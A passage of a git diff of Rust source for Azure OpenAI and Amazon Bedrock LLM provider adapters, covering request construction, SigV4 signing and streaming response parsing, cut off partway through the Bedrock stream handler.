stop_reason = OpenAiProvider::map_finish_reason_pub(finish_reason); - let usage_val = chunk_json.get("usage"); - let usage = usage_val.map(|u| OpenAiProvider::parse_usage_pub(Some(u))); - - yield Ok(StreamEvent::MessageDelta { - stop_reason: Some(stop_reason), - usage, - }); - } - } - } - } - - if message_started { - yield Ok(StreamEvent::MessageStop); - } - }; - - Ok(Box::pin(s)) - } - - async fn list_models(&self) -> Result, ProviderError> { - Ok(vec![ - ModelInfo { - id: ModelId::new("gpt-4o"), - provider_id: self.id.clone(), - name: "GPT-4o (Azure)".to_string(), - context_window: 128_000, - max_output_tokens: 16_384, - }, - ModelInfo { - id: ModelId::new("gpt-4o-mini"), - provider_id: self.id.clone(), - name: "GPT-4o Mini (Azure)".to_string(), - context_window: 128_000, - max_output_tokens: 16_384, - }, - ModelInfo { - id: ModelId::new("gpt-4-turbo"), - provider_id: self.id.clone(), - name: "GPT-4 Turbo (Azure)".to_string(), - context_window: 128_000, - max_output_tokens: 4_096, - }, - ModelInfo { - id: ModelId::new("gpt-35-turbo"), - provider_id: self.id.clone(), - name: "GPT-3.5 Turbo (Azure)".to_string(), - context_window: 16_385, - max_output_tokens: 4_096, - }, - ]) - } - - async fn health_check(&self) -> Result { - // Azure doesn't have a simple /v1/models endpoint without a deployment. - // We do a minimal OPTIONS or HEAD to the base resource URL. - let url = format!( - "https://{}.openai.azure.com/openai/models?api-version={}", - self.resource_name, self.api_version - ); - let resp = self - .http_client - .get(&url) - .header("api-key", &self.api_key) - .send() - .await; - - match resp { - Ok(r) if r.status().is_success() => Ok(ProviderStatus::Healthy), - Ok(r) if r.status().as_u16() == 401 || r.status().as_u16() == 403 => { - Ok(ProviderStatus::Unavailable { - reason: "authentication failed".to_string(), - }) - } - Ok(r) => Ok(ProviderStatus::Degraded { - reason: format!("models endpoint returned {}", r.status()), - }), - Err(e) => Ok(ProviderStatus::Unavailable { - reason: e.to_string(), - }), - } - } - - fn capabilities(&self) -> ProviderCapabilities { - ProviderCapabilities { - streaming: true, - tool_calling: true, - thinking: false, - image_input: true, - pdf_input: false, - audio_input: false, - video_input: false, - caching: false, - structured_output: true, - system_prompt_style: SystemPromptStyle::SystemMessage, - } - } -} +// providers/azure.rs — Azure OpenAI provider adapter. +// +// Azure OpenAI uses the same Chat Completions wire format as OpenAI, but with +// a different URL structure and auth header. +// +// URL: https://{resource}.openai.azure.com/openai/deployments/{deployment}/chat/completions?api-version={version} +// Auth: api-key: (NOT Authorization: Bearer) +// Deployment == model name in Azure. + +use std::pin::Pin; + +use async_stream::stream; +use async_trait::async_trait; +use claurst_core::provider_id::{ModelId, ProviderId}; +use claurst_core::types::{ContentBlock, UsageInfo}; +use futures::Stream; +use serde_json::{json, Value}; +use tracing::debug; + +use crate::error_handling::parse_error_response; +use crate::provider::{LlmProvider, ModelInfo}; +use crate::provider_error::ProviderError; +use crate::provider_types::{ + ProviderCapabilities, ProviderRequest, ProviderResponse, ProviderStatus, StreamEvent, + SystemPromptStyle, +}; +use crate::providers::openai::OpenAiProvider; + +use super::request_options::merge_openai_compatible_options; + +// --------------------------------------------------------------------------- +// AzureProvider +// --------------------------------------------------------------------------- + +pub struct AzureProvider { + id: ProviderId, + resource_name: String, + api_key: String, + api_version: String, + http_client: reqwest::Client, +} + +impl AzureProvider { + pub fn new(resource_name: String, api_key: String) -> Self { + let http_client = reqwest::Client::builder() + .timeout(std::time::Duration::from_secs(600)) + .build() + .expect("failed to build reqwest client"); + + Self { + id: ProviderId::new(ProviderId::AZURE), + resource_name, + api_key, + api_version: "2024-08-01-preview".to_string(), + http_client, + } + } + + pub fn with_api_version(mut self, version: String) -> Self { + self.api_version = version; + self + } + + pub fn from_env() -> Option { + let key = std::env::var("AZURE_API_KEY").ok()?; + let resource = std::env::var("AZURE_RESOURCE_NAME").ok()?; + let version = + std::env::var("AZURE_API_VERSION").unwrap_or_else(|_| "2024-08-01-preview".to_string()); + Some(Self::new(resource, key).with_api_version(version)) + } + + fn endpoint_url(&self, deployment: &str) -> String { + format!( + "https://{}.openai.azure.com/openai/deployments/{}/chat/completions?api-version={}", + self.resource_name, deployment, self.api_version + ) + } + + fn map_http_error(&self, status: u16, body: &str) -> ProviderError { + parse_error_response(status, body, &self.id) + } + + async fn send_non_streaming( + &self, + request: &ProviderRequest, + ) -> Result { + let messages = OpenAiProvider::to_openai_messages_pub( + &request.messages, + request.system_prompt.as_ref(), + ); + let tools = OpenAiProvider::to_openai_tools_pub(&request.tools); + + let mut body = json!({ + "model": request.model, + "max_tokens": request.max_tokens, + "messages": messages, + "stream": false, + }); + + if !tools.is_empty() { + body["tools"] = json!(tools); + } + if let Some(t) = request.temperature { + body["temperature"] = json!(t); + } + if let Some(p) = request.top_p { + body["top_p"] = json!(p); + } + if !request.stop_sequences.is_empty() { + body["stop"] = json!(request.stop_sequences); + } + merge_openai_compatible_options(&mut body, &request.provider_options); + + let url = self.endpoint_url(&request.model); + + let resp = self + .http_client + .post(&url) + .header("api-key", &self.api_key) + .header("Content-Type", "application/json") + .json(&body) + .send() + .await + .map_err(|e| ProviderError::Other { + provider: self.id.clone(), + message: format!("HTTP request failed: {}", e), + status: None, + body: None, + })?; + + let status = resp.status().as_u16(); + let text = resp.text().await.map_err(|e| ProviderError::Other { + provider: self.id.clone(), + message: format!("Failed to read response body: {}", e), + status: Some(status), + body: None, + })?; + + if !(200..300).contains(&(status as usize)) { + return Err(self.map_http_error(status, &text)); + } + + let json_val: Value = serde_json::from_str(&text).map_err(|e| ProviderError::Other { + provider: self.id.clone(), + message: format!("Failed to parse response JSON: {}", e), + status: Some(status), + body: Some(text.clone()), + })?; + + OpenAiProvider::parse_non_streaming_response_pub(&json_val, &self.id) + } + + async fn do_streaming( + &self, + request: &ProviderRequest, + ) -> Result { + let messages = OpenAiProvider::to_openai_messages_pub( + &request.messages, + request.system_prompt.as_ref(), + ); + let tools = OpenAiProvider::to_openai_tools_pub(&request.tools); + + let mut body = json!({ + "model": request.model, + "max_tokens": request.max_tokens, + "messages": messages, + "stream": true, + "stream_options": { "include_usage": true }, + }); + + if !tools.is_empty() { + body["tools"] = json!(tools); + } + if let Some(t) = request.temperature { + body["temperature"] = json!(t); + } + if let Some(p) = request.top_p { + body["top_p"] = json!(p); + } + if !request.stop_sequences.is_empty() { + body["stop"] = json!(request.stop_sequences); + } + merge_openai_compatible_options(&mut body, &request.provider_options); + + let url = self.endpoint_url(&request.model); + + let resp = self + .http_client + .post(&url) + .header("api-key", &self.api_key) + .header("Content-Type", "application/json") + .header("Accept", "text/event-stream") + .json(&body) + .send() + .await + .map_err(|e| ProviderError::Other { + provider: self.id.clone(), + message: format!("HTTP request failed: {}", e), + status: None, + body: None, + })?; + + let status = resp.status().as_u16(); + if !(200..300).contains(&(status as usize)) { + let text = resp.text().await.unwrap_or_default(); + return Err(self.map_http_error(status, &text)); + } + + Ok(resp) + } +} + +// --------------------------------------------------------------------------- +// LlmProvider impl +// --------------------------------------------------------------------------- + +#[async_trait] +impl LlmProvider for AzureProvider { + fn id(&self) -> &ProviderId { + &self.id + } + + fn name(&self) -> &str { + "Azure OpenAI" + } + + async fn create_message( + &self, + request: ProviderRequest, + ) -> Result { + self.send_non_streaming(&request).await + } + + async fn create_message_stream( + &self, + request: ProviderRequest, + ) -> Result> + Send>>, ProviderError> + { + let resp = self.do_streaming(&request).await?; + let provider_id = self.id.clone(); + + let s = stream! { + use futures::StreamExt; + + let mut byte_stream = resp.bytes_stream(); + let mut leftover = String::new(); + + let mut message_started = false; + let mut message_id = String::from("unknown"); + let mut model_name = String::new(); + let mut tool_call_buffers: std::collections::HashMap< + usize, + (String, String, String), + > = std::collections::HashMap::new(); + + while let Some(chunk_result) = byte_stream.next().await { + let chunk = match chunk_result { + Ok(c) => c, + Err(e) => { + yield Err(ProviderError::StreamError { + provider: provider_id.clone(), + message: format!("Stream read error: {}", e), + partial_response: None, + }); + return; + } + }; + + let text = String::from_utf8_lossy(&chunk); + let combined = if leftover.is_empty() { + text.to_string() + } else { + let mut s = std::mem::take(&mut leftover); + s.push_str(&text); + s + }; + + let mut lines: Vec<&str> = combined.split('\n').collect(); + if !combined.ends_with('\n') { + leftover = lines.pop().unwrap_or("").to_string(); + } + + for line in lines { + let line = line.trim_end_matches('\r').trim(); + + if line.is_empty() || line.starts_with(':') { + continue; + } + + let data = if let Some(rest) = line.strip_prefix("data:") { + rest.trim() + } else { + continue; + }; + + if data == "[DONE]" { + yield Ok(StreamEvent::MessageStop); + return; + } + + let chunk_json: Value = match serde_json::from_str(data) { + Ok(v) => v, + Err(e) => { + debug!("Failed to parse Azure SSE chunk: {}: {}", e, data); + continue; + } + }; + + if !message_started { + if let Some(id) = chunk_json.get("id").and_then(|v| v.as_str()) { + message_id = id.to_string(); + } + if let Some(m) = chunk_json.get("model").and_then(|v| v.as_str()) { + model_name = m.to_string(); + } + yield Ok(StreamEvent::MessageStart { + id: message_id.clone(), + model: model_name.clone(), + usage: UsageInfo::default(), + }); + yield Ok(StreamEvent::ContentBlockStart { + index: 0, + content_block: ContentBlock::Text { text: String::new() }, + }); + message_started = true; + } + + let choices = match chunk_json.get("choices").and_then(|c| c.as_array()) { + Some(c) => c, + None => { + if let Some(usage_val) = chunk_json.get("usage") { + let usage = OpenAiProvider::parse_usage_pub(Some(usage_val)); + yield Ok(StreamEvent::MessageDelta { + stop_reason: None, + usage: Some(usage), + }); + } + continue; + } + }; + + let choice = match choices.first() { + Some(c) => c, + None => continue, + }; + + let delta = match choice.get("delta") { + Some(d) => d, + None => continue, + }; + + if let Some(content) = delta.get("content").and_then(|c| c.as_str()) { + if !content.is_empty() { + yield Ok(StreamEvent::TextDelta { + index: 0, + text: content.to_string(), + }); + } + } + + if let Some(tool_calls) = + delta.get("tool_calls").and_then(|t| t.as_array()) + { + for tc in tool_calls { + let tc_index = tc + .get("index") + .and_then(|v| v.as_u64()) + .unwrap_or(0) as usize; + if let Some(tc_id) = tc.get("id").and_then(|v| v.as_str()) { + let name = tc + .get("function") + .and_then(|f| f.get("name")) + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + let block_index = 1 + tc_index; + tool_call_buffers.insert( + block_index, + (tc_id.to_string(), name.clone(), String::new()), + ); + yield Ok(StreamEvent::ContentBlockStart { + index: block_index, + content_block: ContentBlock::ToolUse { + id: tc_id.to_string(), + name, + input: serde_json::json!({}), + }, + }); + } + if let Some(args_frag) = tc + .get("function") + .and_then(|f| f.get("arguments")) + .and_then(|v| v.as_str()) + { + if !args_frag.is_empty() { + let block_index = 1 + tc_index; + if let Some((_, _, buf)) = + tool_call_buffers.get_mut(&block_index) + { + buf.push_str(args_frag); + } + yield Ok(StreamEvent::InputJsonDelta { + index: block_index, + partial_json: args_frag.to_string(), + }); + } + } + } + } + + if let Some(finish_reason) = + choice.get("finish_reason").and_then(|v| v.as_str()) + { + if !finish_reason.is_empty() && finish_reason != "null" { + yield Ok(StreamEvent::ContentBlockStop { index: 0 }); + let mut tc_indices: Vec = + tool_call_buffers.keys().cloned().collect(); + tc_indices.sort(); + for idx in tc_indices { + yield Ok(StreamEvent::ContentBlockStop { index: idx }); + } + + let stop_reason = OpenAiProvider::map_finish_reason_pub(finish_reason); + let usage_val = chunk_json.get("usage"); + let usage = usage_val.map(|u| OpenAiProvider::parse_usage_pub(Some(u))); + + yield Ok(StreamEvent::MessageDelta { + stop_reason: Some(stop_reason), + usage, + }); + } + } + } + } + + if message_started { + yield Ok(StreamEvent::MessageStop); + } + }; + + Ok(Box::pin(s)) + } + + async fn list_models(&self) -> Result, ProviderError> { + Ok(vec![ + ModelInfo { + id: ModelId::new("gpt-4o"), + provider_id: self.id.clone(), + name: "GPT-4o (Azure)".to_string(), + context_window: 128_000, + max_output_tokens: 16_384, + }, + ModelInfo { + id: ModelId::new("gpt-4o-mini"), + provider_id: self.id.clone(), + name: "GPT-4o Mini (Azure)".to_string(), + context_window: 128_000, + max_output_tokens: 16_384, + }, + ModelInfo { + id: ModelId::new("gpt-4-turbo"), + provider_id: self.id.clone(), + name: "GPT-4 Turbo (Azure)".to_string(), + context_window: 128_000, + max_output_tokens: 4_096, + }, + ModelInfo { + id: ModelId::new("gpt-35-turbo"), + provider_id: self.id.clone(), + name: "GPT-3.5 Turbo (Azure)".to_string(), + context_window: 16_385, + max_output_tokens: 4_096, + }, + ]) + } + + async fn health_check(&self) -> Result { + // Azure doesn't have a simple /v1/models endpoint without a deployment. + // We do a minimal OPTIONS or HEAD to the base resource URL. + let url = format!( + "https://{}.openai.azure.com/openai/models?api-version={}", + self.resource_name, self.api_version + ); + let resp = self + .http_client + .get(&url) + .header("api-key", &self.api_key) + .send() + .await; + + match resp { + Ok(r) if r.status().is_success() => Ok(ProviderStatus::Healthy), + Ok(r) if r.status().as_u16() == 401 || r.status().as_u16() == 403 => { + Ok(ProviderStatus::Unavailable { + reason: "authentication failed".to_string(), + }) + } + Ok(r) => Ok(ProviderStatus::Degraded { + reason: format!("models endpoint returned {}", r.status()), + }), + Err(e) => Ok(ProviderStatus::Unavailable { + reason: e.to_string(), + }), + } + } + + fn capabilities(&self) -> ProviderCapabilities { + ProviderCapabilities { + streaming: true, + tool_calling: true, + thinking: false, + image_input: true, + pdf_input: false, + audio_input: false, + video_input: false, + caching: false, + structured_output: true, + system_prompt_style: SystemPromptStyle::SystemMessage, + } + } +} diff --git a/src-rust/crates/api/src/providers/bedrock.rs b/src-rust/crates/api/src/providers/bedrock.rs index bd8c36f..3cf7c0f 100644 --- a/src-rust/crates/api/src/providers/bedrock.rs +++ b/src-rust/crates/api/src/providers/bedrock.rs @@ -1,1031 +1,1013 @@ -// providers/bedrock.rs — Amazon Bedrock provider adapter. -// -// Uses the Bedrock Converse Streaming API which accepts a unified message -// format similar to Anthropic's, making it straightforward to map from -// our internal ProviderRequest. -// -// Endpoint: -// POST https://bedrock-runtime.{region}.amazonaws.com/model/{model_id}/converse-stream -// -// Auth: -// - If AWS_BEARER_TOKEN_BEDROCK is set: Authorization: Bearer -// - Otherwise: AWS SigV4 signed request using access key + secret -// -// Only Claude models on Bedrock are officially supported by this adapter. - -use std::pin::Pin; - -use async_stream::stream; -use async_trait::async_trait; -use claurst_core::provider_id::{ModelId, ProviderId}; -use claurst_core::types::{ContentBlock, MessageContent, Role, ToolResultContent, UsageInfo}; -use futures::Stream; -use serde_json::{json, Value}; -use tracing::debug; - -use crate::error_handling::parse_error_response; -use crate::provider::{LlmProvider, ModelInfo}; -use crate::provider_error::ProviderError; -use crate::provider_types::{ - ProviderCapabilities, ProviderRequest, ProviderResponse, ProviderStatus, StopReason, - StreamEvent, SystemPrompt, SystemPromptStyle, -}; - -use super::message_normalization::remove_empty_messages; -use super::request_options::merge_bedrock_options; - -// --------------------------------------------------------------------------- -// BedrockProvider -// --------------------------------------------------------------------------- - -pub struct BedrockProvider { - id: ProviderId, - region: String, - http_client: reqwest::Client, - access_key_id: Option, - secret_access_key: Option, - session_token: Option, - bearer_token: Option, -} - -impl BedrockProvider { - pub fn from_env() -> Option { - let region = std::env::var("AWS_REGION") - .or_else(|_| std::env::var("AWS_DEFAULT_REGION")) - .unwrap_or_else(|_| "us-east-1".to_string()); - - let http_client = reqwest::Client::builder() - .timeout(std::time::Duration::from_secs(600)) - .build() - .expect("failed to build reqwest client"); - - // Bearer token takes priority over SigV4 credentials. - if let Ok(token) = std::env::var("AWS_BEARER_TOKEN_BEDROCK") { - return Some(Self { - id: ProviderId::new(ProviderId::AMAZON_BEDROCK), - region, - http_client, - access_key_id: None, - secret_access_key: None, - session_token: None, - bearer_token: Some(token), - }); - } - - // Standard SigV4 credentials. - let key = std::env::var("AWS_ACCESS_KEY_ID").ok()?; - let secret = std::env::var("AWS_SECRET_ACCESS_KEY").ok()?; - let session = std::env::var("AWS_SESSION_TOKEN").ok(); - - Some(Self { - id: ProviderId::new(ProviderId::AMAZON_BEDROCK), - region, - http_client, - access_key_id: Some(key), - secret_access_key: Some(secret), - session_token: session, - bearer_token: None, - }) - } - - /// Add a regional cross-inference prefix for models that support it. - fn model_id_with_prefix(&self, model: &str) -> String { - // Skip if already has a dot-separated prefix (e.g. "us.anthropic.claude-...") - if model.contains('.') { - return model.to_string(); - } - let region = &self.region; - if region.starts_with("us-") && !region.contains("gov") { - if model.contains("claude") || model.contains("nova") { - return format!("us.{}", model); - } - } else if region.starts_with("eu-") && model.contains("claude") { - return format!("eu.{}", model); - } - model.to_string() - } - - fn endpoint_url(&self, model_id: &str) -> String { - format!( - "https://bedrock-runtime.{}.amazonaws.com/model/{}/converse-stream", - self.region, - urlencoding::encode(model_id) - ) - } - - // ----------------------------------------------------------------------- - // AWS SigV4 signing - // ----------------------------------------------------------------------- - - fn sign_request( - &self, - method: &str, - url_str: &str, - body: &str, - date: &chrono::DateTime, - ) -> std::collections::HashMap { - use hmac::{Hmac, Mac}; - use sha2::{Digest, Sha256}; - - type HmacSha256 = Hmac; - - let mut headers = std::collections::HashMap::new(); - - // If we have a bearer token, skip SigV4. - if let Some(ref token) = self.bearer_token { - headers.insert("Authorization".to_string(), format!("Bearer {}", token)); - return headers; - } - - let access_key = match &self.access_key_id { - Some(k) => k.clone(), - None => return headers, - }; - let secret_key = match &self.secret_access_key { - Some(s) => s.clone(), - None => return headers, - }; - - let date_str = date.format("%Y%m%d").to_string(); - let datetime_str = date.format("%Y%m%dT%H%M%SZ").to_string(); - let service = "bedrock"; - let region = &self.region; - - // Parse path and query from URL. - let parsed = url::Url::parse(url_str).unwrap_or_else(|_| { - url::Url::parse("https://bedrock-runtime.us-east-1.amazonaws.com/").unwrap() - }); - let canonical_uri = { - let p = parsed.path(); - if p.is_empty() { "/".to_string() } else { p.to_string() } - }; - let canonical_query = parsed.query().unwrap_or("").to_string(); - - // Body hash. - let body_hash = hex::encode(Sha256::digest(body.as_bytes())); - - // Canonical headers (must be sorted, lowercased). - let host = parsed.host_str().unwrap_or_default().to_string(); - let content_type = "application/json"; - - // Build canonical headers string and signed headers list. - // Include: content-type, host, x-amz-content-sha256, x-amz-date, - // and optionally x-amz-security-token. - let mut canonical_headers = format!( - "content-type:{}\nhost:{}\nx-amz-content-sha256:{}\nx-amz-date:{}\n", - content_type, host, body_hash, datetime_str - ); - let mut signed_headers = - "content-type;host;x-amz-content-sha256;x-amz-date".to_string(); - - if let Some(ref tok) = self.session_token { - canonical_headers.push_str(&format!("x-amz-security-token:{}\n", tok)); - signed_headers.push_str(";x-amz-security-token"); - } - - // Canonical request. - let canonical_request = format!( - "{}\n{}\n{}\n{}\n{}\n{}", - method, - canonical_uri, - canonical_query, - canonical_headers, - signed_headers, - body_hash - ); - - // String to sign. - let credential_scope = - format!("{}/{}/{}/aws4_request", date_str, region, service); - let canonical_request_hash = - hex::encode(Sha256::digest(canonical_request.as_bytes())); - let string_to_sign = format!( - "AWS4-HMAC-SHA256\n{}\n{}\n{}", - datetime_str, credential_scope, canonical_request_hash - ); - - // Signing key: HMAC-SHA256 chain. - let sign_key = { - let k_date = { - let mut mac = HmacSha256::new_from_slice( - format!("AWS4{}", secret_key).as_bytes(), - ) - .expect("HMAC init failed"); - mac.update(date_str.as_bytes()); - mac.finalize().into_bytes() - }; - let k_region = { - let mut mac = HmacSha256::new_from_slice(&k_date) - .expect("HMAC init failed"); - mac.update(region.as_bytes()); - mac.finalize().into_bytes() - }; - let k_service = { - let mut mac = HmacSha256::new_from_slice(&k_region) - .expect("HMAC init failed"); - mac.update(service.as_bytes()); - mac.finalize().into_bytes() - }; - let k_signing = { - let mut mac = HmacSha256::new_from_slice(&k_service) - .expect("HMAC init failed"); - mac.update(b"aws4_request"); - mac.finalize().into_bytes() - }; - k_signing - }; - - let signature = { - let mut mac = - HmacSha256::new_from_slice(&sign_key).expect("HMAC init failed"); - mac.update(string_to_sign.as_bytes()); - hex::encode(mac.finalize().into_bytes()) - }; - - let authorization = format!( - "AWS4-HMAC-SHA256 Credential={}/{}, SignedHeaders={}, Signature={}", - access_key, credential_scope, signed_headers, signature - ); - - headers.insert("Authorization".to_string(), authorization); - headers.insert("x-amz-date".to_string(), datetime_str); - headers.insert("x-amz-content-sha256".to_string(), body_hash); - if let Some(ref tok) = self.session_token { - headers.insert("x-amz-security-token".to_string(), tok.clone()); - } - - headers - } - - // ----------------------------------------------------------------------- - // Request body builders - // ----------------------------------------------------------------------- - - fn build_converse_body(request: &ProviderRequest) -> Value { - let messages = Self::build_converse_messages(request); - let mut body = json!({ - "messages": messages, - "inferenceConfig": { - "maxTokens": request.max_tokens, - "temperature": request.temperature.unwrap_or(0.7), - "topP": request.top_p.unwrap_or(0.9), - "stopSequences": request.stop_sequences, - } - }); - - // System prompt. - if let Some(sys) = &request.system_prompt { - let sys_text = match sys { - SystemPrompt::Text(t) => t.clone(), - SystemPrompt::Blocks(blocks) => blocks - .iter() - .map(|b| b.text.clone()) - .collect::>() - .join("\n"), - }; - body["system"] = json!([{ "text": sys_text }]); - } - - // Tool definitions. - if !request.tools.is_empty() { - let tool_specs: Vec = request - .tools - .iter() - .map(|td| { - json!({ - "toolSpec": { - "name": td.name, - "description": td.description, - "inputSchema": { - "json": td.input_schema - } - } - }) - }) - .collect(); - body["toolConfig"] = json!({ "tools": tool_specs }); - } - - if let Some(thinking) = &request.thinking { - body["reasoningConfig"] = json!({ - "type": "enabled", - "budgetTokens": thinking.budget_tokens, - }); - } - - merge_bedrock_options(&mut body, &request.provider_options); - - body - } - - fn build_converse_messages(request: &ProviderRequest) -> Vec { - remove_empty_messages(&request.messages) - .iter() - .map(|msg| { - let role = match msg.role { - Role::User => "user", - Role::Assistant => "assistant", - }; - let content = Self::message_content_to_converse(&msg.content, &msg.role); - json!({ "role": role, "content": content }) - }) - .collect() - } - - fn message_content_to_converse(content: &MessageContent, role: &Role) -> Vec { - match content { - MessageContent::Text(t) => vec![json!({ "text": t })], - MessageContent::Blocks(blocks) => blocks - .iter() - .filter_map(|b| Self::content_block_to_converse(b, role)) - .collect(), - } - } - - fn content_block_to_converse(block: &ContentBlock, role: &Role) -> Option { - match block { - ContentBlock::Text { text } => Some(json!({ "text": text })), - ContentBlock::Image { source } => { - // Bedrock Converse image format. - let media_type = source - .media_type - .as_deref() - .unwrap_or("image/png") - .replace("image/", ""); - if let Some(data) = &source.data { - Some(json!({ - "image": { - "format": media_type, - "source": { - "bytes": data - } - } - })) - } else if let Some(url) = &source.url { - // Bedrock doesn't support URL images natively; skip. - debug!("Bedrock does not support URL images: {}", url); - None - } else { - None - } - } - ContentBlock::ToolUse { id, name, input } => Some(json!({ - "toolUse": { - "toolUseId": id, - "name": name, - "input": input - } - })), - ContentBlock::ToolResult { - tool_use_id, - content, - is_error, - } => { - let result_content = match content { - ToolResultContent::Text(t) => vec![json!({ "text": t })], - ToolResultContent::Blocks(inner) => inner - .iter() - .filter_map(|b| Self::content_block_to_converse(b, role)) - .collect(), - }; - let status = if is_error.unwrap_or(false) { - "error" - } else { - "success" - }; - Some(json!({ - "toolResult": { - "toolUseId": tool_use_id, - "content": result_content, - "status": status - } - })) - } - ContentBlock::Thinking { thinking, .. } => Some(json!({ "text": thinking })), - _ => None, - } - } - - // ----------------------------------------------------------------------- - // HTTP helpers - // ----------------------------------------------------------------------- - - fn map_http_error(&self, status: u16, body: &str) -> ProviderError { - parse_error_response(status, body, &self.id) - } - - // ----------------------------------------------------------------------- - // Send helpers - // ----------------------------------------------------------------------- - - async fn send_streaming( - &self, - request: &ProviderRequest, - ) -> Result { - let bedrock_model = self.model_id_with_prefix(&request.model); - let url = self.endpoint_url(&bedrock_model); - - let body = Self::build_converse_body(request); - let body_str = serde_json::to_string(&body).unwrap_or_default(); - - let now = chrono::Utc::now(); - let auth_headers = self.sign_request("POST", &url, &body_str, &now); - - let mut req_builder = self - .http_client - .post(&url) - .header("Content-Type", "application/json") - .header("Accept", "application/vnd.amazon.eventstream"); - - for (k, v) in &auth_headers { - req_builder = req_builder.header(k.as_str(), v.as_str()); - } - - let resp = req_builder - .body(body_str) - .send() - .await - .map_err(|e| ProviderError::Other { - provider: self.id.clone(), - message: format!("HTTP request failed: {}", e), - status: None, - body: None, - })?; - - let status = resp.status().as_u16(); - if !(200..300).contains(&(status as usize)) { - let text = resp.text().await.unwrap_or_default(); - return Err(self.map_http_error(status, &text)); - } - - Ok(resp) - } - - async fn send_non_streaming( - &self, - request: &ProviderRequest, - ) -> Result { - let bedrock_model = self.model_id_with_prefix(&request.model); - // Non-streaming uses /converse (not /converse-stream) - let url = format!( - "https://bedrock-runtime.{}.amazonaws.com/model/{}/converse", - self.region, - urlencoding::encode(&bedrock_model) - ); - - let body = Self::build_converse_body(request); - let body_str = serde_json::to_string(&body).unwrap_or_default(); - - let now = chrono::Utc::now(); - let auth_headers = self.sign_request("POST", &url, &body_str, &now); - - let mut req_builder = self - .http_client - .post(&url) - .header("Content-Type", "application/json"); - - for (k, v) in &auth_headers { - req_builder = req_builder.header(k.as_str(), v.as_str()); - } - - let resp = req_builder - .body(body_str) - .send() - .await - .map_err(|e| ProviderError::Other { - provider: self.id.clone(), - message: format!("HTTP request failed: {}", e), - status: None, - body: None, - })?; - - let status = resp.status().as_u16(); - let text = resp.text().await.map_err(|e| ProviderError::Other { - provider: self.id.clone(), - message: format!("Failed to read response body: {}", e), - status: Some(status), - body: None, - })?; - - if !(200..300).contains(&(status as usize)) { - return Err(self.map_http_error(status, &text)); - } - - let json_val: Value = serde_json::from_str(&text).map_err(|e| ProviderError::Other { - provider: self.id.clone(), - message: format!("Failed to parse response JSON: {}", e), - status: Some(status), - body: Some(text.clone()), - })?; - - Self::parse_converse_response(&json_val, &self.id) - } - - fn parse_converse_response( - json: &Value, - provider_id: &ProviderId, - ) -> Result { - // Bedrock Converse non-streaming response shape: - // { "output": { "message": { "role": "assistant", "content": [...] } }, - // "stopReason": "end_turn", - // "usage": { "inputTokens": N, "outputTokens": M } } - - let message = json - .get("output") - .and_then(|o| o.get("message")) - .ok_or_else(|| ProviderError::Other { - provider: provider_id.clone(), - message: "No output.message in Bedrock response".to_string(), - status: None, - body: None, - })?; - - let content_blocks = Self::parse_converse_content( - message.get("content").and_then(|c| c.as_array()), - ); - - let stop_reason_str = json - .get("stopReason") - .and_then(|v| v.as_str()) - .unwrap_or("end_turn"); - let stop_reason = Self::map_stop_reason(stop_reason_str); - - let usage = Self::parse_converse_usage(json.get("usage")); - - Ok(ProviderResponse { - id: uuid::Uuid::new_v4().to_string(), - content: content_blocks, - stop_reason, - usage, - model: json - .get("model") - .and_then(|v| v.as_str()) - .unwrap_or("") - .to_string(), - }) - } - - fn parse_converse_content(content: Option<&Vec>) -> Vec { - let blocks = match content { - Some(b) => b, - None => return vec![], - }; - - blocks - .iter() - .filter_map(|b| { - if let Some(text) = b.get("text").and_then(|v| v.as_str()) { - return Some(ContentBlock::Text { - text: text.to_string(), - }); - } - if let Some(tu) = b.get("toolUse") { - let id = tu - .get("toolUseId") - .and_then(|v| v.as_str()) - .unwrap_or("") - .to_string(); - let name = tu - .get("name") - .and_then(|v| v.as_str()) - .unwrap_or("") - .to_string(); - let input = tu.get("input").cloned().unwrap_or(json!({})); - return Some(ContentBlock::ToolUse { id, name, input }); - } - None - }) - .collect() - } - - fn map_stop_reason(reason: &str) -> StopReason { - match reason { - "end_turn" => StopReason::EndTurn, - "max_tokens" => StopReason::MaxTokens, - "tool_use" => StopReason::ToolUse, - "stop_sequence" => StopReason::StopSequence, - "content_filtered" => StopReason::ContentFiltered, - other => StopReason::Other(other.to_string()), - } - } - - fn parse_converse_usage(usage: Option<&Value>) -> UsageInfo { - let u = match usage { - Some(v) => v, - None => return UsageInfo::default(), - }; - UsageInfo { - input_tokens: u - .get("inputTokens") - .and_then(|v| v.as_u64()) - .unwrap_or(0), - output_tokens: u - .get("outputTokens") - .and_then(|v| v.as_u64()) - .unwrap_or(0), - cache_creation_input_tokens: 0, - cache_read_input_tokens: 0, - } - } -} - -// --------------------------------------------------------------------------- -// LlmProvider impl -// --------------------------------------------------------------------------- - -#[async_trait] -impl LlmProvider for BedrockProvider { - fn id(&self) -> &ProviderId { - &self.id - } - - fn name(&self) -> &str { - "Amazon Bedrock" - } - - async fn create_message( - &self, - request: ProviderRequest, - ) -> Result { - self.send_non_streaming(&request).await - } - - async fn create_message_stream( - &self, - request: ProviderRequest, - ) -> Result> + Send>>, ProviderError> - { - let resp = self.send_streaming(&request).await?; - let provider_id = self.id.clone(); - - // Bedrock Converse streaming uses AWS EventStream binary framing. - // For simplicity we parse the JSON chunks that appear within the - // event payload bytes. Each event is a binary-framed blob containing - // a JSON payload under the ":event-type" header. - // - // We fall back to text-based JSON parsing by scanning for JSON objects - // in the raw bytes, which works reliably for the common text delta events. - let s = stream! { - use futures::StreamExt; - - let mut byte_stream = resp.bytes_stream(); - let mut buf: Vec = Vec::new(); - let mut message_started = false; - - while let Some(chunk_result) = byte_stream.next().await { - let chunk = match chunk_result { - Ok(c) => c, - Err(e) => { - yield Err(ProviderError::StreamError { - provider: provider_id.clone(), - message: format!("Stream read error: {}", e), - partial_response: None, - }); - return; - } - }; - - buf.extend_from_slice(&chunk); - - // Extract all complete JSON objects from the buffer. - // The AWS event-stream format prefixes each event with a - // 12-byte prelude (total-len + headers-len + crc32) followed - // by variable-length headers and then a JSON payload. Rather - // than fully parsing the binary framing we scan for JSON - // object boundaries which is sufficient for the text events. - loop { - // Find the first '{' in the buffer. - let start = match buf.iter().position(|&b| b == b'{') { - Some(p) => p, - None => { - buf.clear(); - break; - } - }; - - // Drain everything before the opening brace. - buf.drain(..start); - - // Try to parse a complete JSON object. - match serde_json::from_slice::(&buf) { - Ok(val) => { - let consumed = serde_json::to_vec(&val) - .map(|v| v.len()) - .unwrap_or(buf.len()); - buf.drain(..consumed); - // 